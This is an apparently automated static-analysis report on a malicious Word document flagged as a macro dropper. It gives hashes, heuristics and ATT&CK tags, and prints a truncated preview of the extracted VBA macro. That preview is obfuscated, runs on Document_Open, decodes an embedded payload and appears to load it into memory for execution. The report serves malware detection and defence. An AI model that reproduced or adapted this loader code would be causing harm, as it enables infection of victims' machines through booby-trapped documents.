Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 01528c87460d8f62…

MALICIOUS

Office (OLE)

313.5 KB Created: 2017-11-21 13:11:00 Authoring application: Microsoft Office Word First seen: 2018-01-08
MD5: e451c1d655458eb9a5c21f5fb07a6a24 SHA-1: 3e6b74e88f382129f715bf51c95228f1812db87f SHA-256: 01528c87460d8f624129e196d5ca318ed7be5a0043f7ad7e1039f49265eb1fca
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be designed to download and execute a second-stage payload from a remote URL. The ClamAV detection 'Doc.Dropper.Agent-6409921-0' further supports its malicious nature. The embedded URL is suspicious and likely serves as the initial point of contact for the payload.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6409921-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6409921-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7989 bytes
SHA-256: f5795943ed624beac2a75cb0cd6ffd01cf5caa3a7bdda1ec08975701c89d59af
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
Dim europeanization As Variant
Dim faenum As Variant
achromatous
alarmingly = 25 + 15
 Pmt 0, alarmingly, 5329, 47642, 8
End Sub
Sub achromatous()
unwelcome.rapt.Value = Day(#12/5/2013#)
Set aorist = unwelcome.rapt.SelectedItem
neoplasia = 43 + 7
Pmt 0, neoplasia, 24744, 31974, 5
mountains = aorist.Name
meteorologist = 92 - 58 + 7810
locofoco = Right(mountains, meteorologist)
victimize = enceliopsis(locofoco)
intolerable = 20 + 18
Pmt 0, intolerable, 32628, 11229, 5
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim biliary As LongPtr
Dim atole As LongPtr
Dim quicksands As LongPtr
Dim novice As LongPtr
Authorsr = 69 - 25 + 2020
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim atole As Long
Dim biliary As Long
Dim quicksands As Long
toimeme = 11 - 17 + 787
Dim novice As Long
Authorsr = toimeme + 3459
#End If
psychology = 60 + 33
Pmt 0, psychology, 31062, 23258, 6
shikar = 51 + 15
Pmt 0, shikar, 19616, 32862, 2
cestum = victimize
biliary = mildran.eyelid(cestum)
Dim existentialist As Byte
Dim rooted As Long
quicksands = 36 - 18 - 18
atole = biliary + Authorsr
novice = 3 - 10 + 201534
alea = clarinetist(novice, _
quicksands, _
atole, quicksands, _
quicksands, quicksands, quicksands)
inequitably = 20 + 20
Pmt 0, inequitably, 32517, 23183, 5
End Sub

Function enceliopsis(unmodulated) As String
Dim ratione As Long
montevideo = Math.Round(284)
homogeneously = "flanking"
Dim metabolite(63) As Long
Dim commutative As Long
Dim corrival(63) As Long
Dim disprove(63) As Long
Dim nauseate As Long
Dim hoarder() As Byte
Dim farkleberry As Long
Dim e(6962) As Byte
advisee = 45 - 121 + 332
mb = 122 - 97 + 230
eagle = 124 - 25 - 35
Dim cowper As Integer
department = 27 - 94 + 65347
gravel = 76 - 2 + 262070
chattel = 100 - 5 + 16711585
ivory = 126 - 90 + 65500
detractory = 37 - 97 + 4156
Dim montanan As String
materialize = 96 - 41 - 55
cancellated = 12 - 99 + 7930
Dim oscine() As Byte
Dim beamends As String
Dim malva As Integer
oscine = VBA.StrConv(unmodulated, 128)
Dim unambitious As Long
tanglebush = 37 + 21
Pmt 0, tanglebush, 4973, 55252, 5
lightfooted = 7840 + 3
CloseUp = vbKeyShift - 12
For hormone = (3 - 3) To lightfooted
If hormone Mod 2 = (4 - 4) Then
oscine(hormone) = oscine(hormone) - CloseUp
Else
oscine(hormone) = oscine(hormone) - (CloseUp - 1)
End If
Next hormone
surface = 30 + 3
Pmt 0, surface, 9375, 44249, 7
kappa = zambia
For nauseate = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
disprove(nauseate) = atopognosia(nauseate, eagle, 66)
corrival(nauseate) = atopognosia(nauseate, detractory, 66)
metabolite(nauseate) = atopognosia(nauseate, gravel, 66)
Next nauseate
grievously = 49 + 50
Pmt 0, grievously, 18764, 37821, 8
hoarder = oscine
apollyon = 19 + 36
Pmt 0, apollyon, 26387, 26777, 5
hardearned = 24 - 110 + 89
adenoidal = Fix(416)
montevideo = Rnd(198)
multiply = hardearned + 1
hourglass = 6 - 61 + 57
For commutative = (5 - 5) To lightfooted
galop = hoarder(commutative)
compositor = hoarder(commutative + 2)
pharmacological = corrival(kappa(hoarder(commutative + 1)))
issus = disprove(kappa(compositor)) + kappa(hoarder(commutative + hardearned))
ratione = metabolite(kappa(galop)) + pharmacological + issus
nauseate = atopognosia(ratione, chattel, 58)
e(farkleberry) = atopognosia(nauseate, ivory, 48)
nauseate = atopognosia(ratione, department, 58)
e(farkleberry + 1) = atopognosia(nauseate, advisee, 48)
e(farkleberry + hourglass) = atopognosia(ratione, mb, 58)
farkleberry = farkleberry + hourglass + 1
commutative = commutative + 3
Next
enceliopsis = e
End Function


Attribute VB_Name = "sideboard"
'  Es ist kalt und regungslos
#If (13 * 3 + 5)
... (truncated)